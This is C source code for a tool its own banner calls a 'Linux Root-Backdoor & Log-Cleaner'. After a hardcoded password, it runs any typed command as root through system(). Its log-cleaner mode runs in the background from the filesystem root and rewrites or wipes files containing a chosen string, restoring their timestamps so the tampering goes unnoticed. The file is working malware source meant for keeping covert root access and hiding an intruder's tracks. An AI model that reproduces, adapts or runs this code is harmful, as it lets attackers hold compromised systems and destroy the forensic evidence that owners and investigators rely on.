#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

//Define the initial path that the program will start searching for files
#define INITPATH "/"
#define CDPATH "/tmp"

//Define the maximum length of the string to be replaced or deleted
#define MAXSTRING 256

//Struct that defines the parameters for each option
typedef struct CHOICE
{
	int choice;
	char string1[MAXSTRING];
	char string2[MAXSTRING];
	int depth;
} ALLCHOICES;

//Number of total choices
int numOfChoices = 0;

//Tables that will store all choices
ALLCHOICES *allOptions;
ALLCHOICES *allOptionsSaved;

//Function that will initialize all members of struct CHOICE
void initChoice(ALLCHOICES *currentChoice);
//Function that will free option dynamic allocations when the program finishes
void freeAllchoices();

//Function to get users choice
int getUserChoice();

//Function that will initialize all members of struct CHOICE
void initChoice(ALLCHOICES *currentChoice)
{
	currentChoice->choice = 0;
	memset(currentChoice->string1, 0 , MAXSTRING);
	memset(currentChoice->string2, 0 , MAXSTRING);
	currentChoice->depth = 0;
}

//Function that will free option dynamic allocations when the program finishes
void freeAllchoices()
{
	free (allOptions);
	free (allOptionsSaved);
}

//Function to get users choice
int getUserChoice()
{
	int option = 0;
	printf("\n");
	printf("Log Cleaner- Select a cleaning method: \n");
	printf("  -(1) Search/replace string from files \n");
	printf("  -(2) Search string delete lines where found \n");
	printf("  -(3) Search delete string only from files \n");
	printf("  -(4) Search string, delete all file contents where string found \n");
	printf("  -(5) Cancel and exit \n\n");
	printf("Choose an option between 1 and 5: ");
	scanf("%d",&option);
	
	//Check if option is within the choices
	if ((option >= 1) && (option <=5))
	{
		//Save the new option
		allOptions[numOfChoices].choice = option;
		
		//Increase choices
		numOfChoices++;
		
		//Increase the size of stored choices
		memcpy(allOptionsSaved, allOptions, numOfChoices * sizeof(ALLCHOICES));
		free(allOptions);
		allOptions = (ALLCHOICES *) malloc((numOfChoices + 1) * sizeof(ALLCHOICES));
		memcpy(allOptions, allOptionsSaved, numOfChoices * sizeof(ALLCHOICES));
		free(allOptionsSaved);
		allOptionsSaved = (ALLCHOICES *) malloc((numOfChoices + 1) * sizeof(ALLCHOICES));
		memcpy(allOptionsSaved, allOptions, numOfChoices * sizeof(ALLCHOICES));
		initChoice(&allOptions[numOfChoices]);
		initChoice(&allOptionsSaved[numOfChoices]);

		return option;
	}
	//or send 0 in case of wrong choice
	else
	{
		return 0;
	}
}

void filterString()
{
	//Initialize dynamic tables to keep choices and strings
	allOptions = (ALLCHOICES *) malloc(1 * sizeof(ALLCHOICES));
	initChoice(&allOptions[0]);
	allOptionsSaved = (ALLCHOICES *) malloc(1 * sizeof(ALLCHOICES));
	initChoice(&allOptionsSaved[0]);
	
	//Variable to keep last choice
	int lastChoice = 0;
	
	char command[MAXSTRING];
	
	//Variable to indicate that the user is not finished yet
	char finished = 'n';
	
	//General counter variable
	int i = 0;
	
	//Seconds to delay
	int delay = 0;

	pid_t childPID = 0;

	//Loop that will collect all users choices
	while (strcmp(&finished,"n"))
	{
		lastChoice =  getUserChoice();
		if (!lastChoice)
		{
			printf("\n*** Select a number between 1 and 5 ***\n");
		}
		else
		{
			switch(lastChoice)
			{
				case 1:
				{
					printf("\n(1) Search/replace string from files \n");
					printf("\n   -Enter the string you wish to search: ");
					scanf("%s", allOptions[numOfChoices - 1].string1);
					printf("\n   -Enter the string you wish to replace it with: ");
					scanf("%s", allOptions[numOfChoices - 1].string2);
					printf("\n   -Enter the maximum directory depth to search: ");
					scanf("%d", &allOptions[numOfChoices - 1].depth);
					break;
				}
				

				case 2:
                                {
                                        printf("(2) Search string delete lines where found \n");
                                        printf("\n   -Enter the string you wish to search: ");
                                        scanf("%s", allOptions[numOfChoices - 1].string1);
                                        printf("\n   -Enter the number of directory levels deep to search: ");
                                        scanf("%d", &allOptions[numOfChoices - 1].depth);
                                        break;
                                }


				case 3:
				{
					printf("(3) Search delete string from files \n");
					printf("\n   -Enter the string you wish to search and delete: ");
					scanf("%s", allOptions[numOfChoices - 1].string1);
					printf("\n   -Enter the number of directory levels deep to search: ");
					scanf("%d", &allOptions[numOfChoices - 1].depth);
					break;
				}
				case 4:
				{
					printf("(4) Search string, delete all file contents where string found \n");
					printf("\n   -Enter the string you wish to find/clear contents: ");
					scanf("%s", allOptions[numOfChoices - 1].string1);
					printf("\n   -Enter the number of directory levels deep to search: ");
					scanf("%d", &allOptions[numOfChoices - 1].depth);
					break;
				}
				case 5:
				{
					printf("~Bye!");
					freeAllchoices();
					return;
				}
				default:
				{
					printf("Program should never reach this point!!!\n");
				}	
			}
		}

		printf("\n#Log Cleaner Task Summary#:");	
		for (i = 0; i < numOfChoices; i++)
		{
			printf("\n  -Chosen option: %d Search string: %s Replacement: %s Dir depth: %d\n",allOptions[i].choice,allOptions[i].string1,allOptions[i].string2,allOptions[i].depth);
		}

		printf("\nAny more search/replace/delete searches to add? (y/n): ");
		scanf("%s",&finished);
	}
	
	
	// Then prompt user for timer before execute:
	printf("\nEnter seconds before execute/daemonize: ");
	scanf("%d",&delay);
	
	childPID = fork();

	if (childPID == 0)
	{
		sleep(delay);
	
		for (i = 0; i < numOfChoices; i++)
		{
				switch(allOptions[i].choice)
				{
					case 1:
					{
						printf("\nProcessing task %d: Choice:%d Replace string %s with %s for %d levels of depth\n",i,allOptions[i].choice,allOptions[i].string1,allOptions[i].string2,allOptions[i].depth);
						//Execute command to change to initial directory and complete task
						memset(command, 0, MAXSTRING);
						sprintf(command, "\ncd %s;find %s -maxdepth %d -xdev -type f -print -exec sed -i.bak 's+%s+%s+gI' {} \\; -exec touch -r {}.bak {} \\; -exec rm {}.bak \\;", CDPATH, INITPATH, allOptions[i].depth,allOptions[i].string1,allOptions[i].string2);					
						printf("%s\n",command);
						system(command);
						break;
					}
				

					case 2:
                                        {
                                                printf("\nProcessing task %d: Choice:%d Delete lines that contain string %s for %d levels of depth\n",i,allOptions[i].choice,allOptions[i].string1,allOptions[i].depth);
                                                memset(command, 0, MAXSTRING);
                                                sprintf(command, "\ncd %s;find %s -maxdepth %d -xdev -type f -print -exec grep -i \"%s\" -l {} \\; -exec sed -i.bak '\\+%s+d' {} \\; -exec touch -r {}.bak {} \\; -exec rm {}.bak \\;", CDPATH, INITPATH, allOptions[i].depth,allOptions[i].string1,allOptions[i].string1);
                                                printf("%s\n",command);
                                                system(command);
                                                break;
                                        }


					case 3:
					{
						printf("\nProcessing task %d: Choice:%d Delete string %s for %d levels of depth\n",i,allOptions[i].choice,allOptions[i].string1,allOptions[i].depth);
						memset(command, 0, MAXSTRING);
						sprintf(command, "\ncd %s;find %s -maxdepth %d -xdev -type f -print -exec sed -i.bak 's+%s++gI' {} \\; -exec touch -r {}.bak {} \\; -exec rm {}.bak \\;", CDPATH, INITPATH, allOptions[i].depth,allOptions[i].string1);					
						printf("%s\n",command);
						system(command);
						break;
					}
					case 4:
					{
						printf("\nProcessing task %d: Choice:%d Delete files that contain string %s for %d levels of depth\n",i,allOptions[i].choice,allOptions[i].string1,allOptions[i].depth);
						memset(command, 0, MAXSTRING);
						sprintf(command, "\ncd %s;find %s -maxdepth %d -xdev -type f -print -exec grep -i \"%s\" -l {} \\; -exec sed -i.bak '\\+.+d' {} \\; -exec touch -r {}.bak {} \\; -exec rm {}.bak \\;", CDPATH, INITPATH, allOptions[i].depth,allOptions[i].string1);					
						printf("%s\n",command);
						system(command);
						break;
					}
					default:
					{
						printf("Program should never reach this point!!!\n");
					}	
				}
		}

		freeAllchoices();
	}
	else
	{
		printf ("\nThe Log Cleaner will daemonize in the background with process id %d.\n", childPID);
	}
}

int main ()
{

	setuid(0);
	setgid(0);
	pid_t childPID = 0;
	int childState = 0;
	char that[128];
	char abc[128];
	// Change pass to your own password
	char pass[128] = "r0ng";
	char attempt[128];


	while (strcmp(attempt,pass))  {
	scanf("%s",attempt);
	}
	getchar();
	system("\nclear\n");


	a:
	printf("\n");
	printf(" ___________\n");
	printf("|           |Linux\n");
	printf("|<Last|Door>|Root-\n");
	printf("| --------- |Backdoor\n");
	printf("|         O |&\n");
	printf("|           |Log-\n");
	printf("|           |Cleaner\n");
	printf("|___________|~r0ng\n");
	printf("\nHackers2DevNull.blogspot.co.uk\n");
	printf("(The user bears responsibility)");
	printf("\n");
	printf("\nSelect an option:\n\n1. Send root commands to system\n2. Show Log Cleaner options menu\n3. Exit and close program\n>");


	fgets(abc,128,stdin);

	if(!strncmp(abc,"1\n",128))
	{
		b:
		printf("\nEnter command to send to system as root (or menu to return)\n>");

		fgets(that, 128, stdin);

		if(!strncmp(that,"menu\n",128))
		{
	 		goto a;
		}
		else
		{
			system(that);
			goto b;
		}
	}
	else if(!strncmp(abc,"2\n",128))
	{
		childPID = fork();
		if (childPID == 0)
		{
			filterString();
			printf("\nDone!");
			exit(0);
		}
		else
		{
			wait(&childState);
		}
	}
	else if(!strncmp(abc,"3\n",128))
	{
	    exit(0);
	}
	else
	{
		printf("Wrong option\n");
		goto a;
	}	
	return(0);
}


